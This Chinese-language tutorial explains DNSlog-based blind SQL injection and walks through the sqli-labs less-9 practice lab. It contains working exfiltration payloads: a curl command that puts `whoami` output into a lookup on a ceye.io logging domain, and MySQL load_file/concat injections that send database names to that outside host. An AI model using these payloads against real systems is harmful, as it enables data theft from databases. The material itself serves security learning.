原理
可能有人对 DNSlog 比较陌生,先简单说一下 DNS,想深入了解的可以跳转到 DNS 原理入门 进行学习。
DNS
DNS 就是把域名转成 IP 地址。
在我们访问服务器时,比如在浏览器输入:www.google.com,『www.google.com』被叫做域名,域名是为了方便人类记忆,每一个域名都对应一个 IP 地址,机器通过 IP 地址找到服务器。
log
log 是日志的意思,DNSlog 就是 DNS 解析过程中产生的一些记录,我们可以通过 log 制造显位。
DNSlog
DNSlog 盲注比其他盲注效率更高,不需要一遍遍根据真假判断,直接输入查询语句就可以获取数据,也不需要在页面上有显位。
直接上手体验一下:
打开 ceye ,注册账号后进入 http://ceye.io/profile, 复制 Identifier 那一行对应的地址,比如我的是:o0xqgs.ceye.io
然后打开命令行使用 curl 命令:curl o0xqgs.ceye.io,可以看到返回了一个 json 对象,然后打开 http://ceye.io/records/dns,刷新一下,可以看到页面多了几条记录,就是我们刚刚那条命令所产生的。
在地址前随便加上什么:curl dns.o0xqgs.ceye.io,再刷新页面,可以看到也显示在页面上了
接着使用一条查询命令:`whoami`,这是一条查询当前用户的命令,命令行输入:curl `whoami`.o0xqgs.ceye.io,刷新页面,可以看到自己的用户名显示在前面,http://ceye.io/records/http 页面也可以看到
这样我们就通过 DNSlog 拿到了数据
DNSlog 盲注
MySQL 中 load_file() 函数可以发起请求,把 SQL 查询语句像上面的 whoami 一样,做为请求的一部分发送,然后在 DNSlog 得到回显的数据:
# abc 表示文件名,存不存在并没有关系,只要向你的地址发起请求即可
load_file(concat('\\\\',(select database()),'.mysql.o0xqgs.ceye.io\\abc'))
把 『select database()』替换成其他查询语句,就可以获取其他数据。
需要注意的是,这些数据格式和内容都有限制,需要进行一些处理,比如不能出现『~、@、:』等一些特殊符号,而且这个请求函数只能在 Windows 操作系统上执行。
练习
sqli-labs 的 less-9:
-
注入判断
url 后输入 id:?/id=1,页面返回:you are in
输入:?id=1',页面返回:you are in
输入:?id=1' and '1'='1,页面返回:you are in
输入:?id=1' and '1'='2,页面返回:you are in
不管什么情况页面返回的都是 you are in,不过这次不用时间盲注,用 DNSlog 盲注 -
获取数据
输入:?id=1' and load_file(concat('\\',(select database()),'.o0xqgs.ceye.io\\abc')) --+
刷新页面,可以看到当前数据库名显示出来了,把上面的 『select database()』换成前面章节获取数据的查询语句就可以获取到我们要的数据了。
网友评论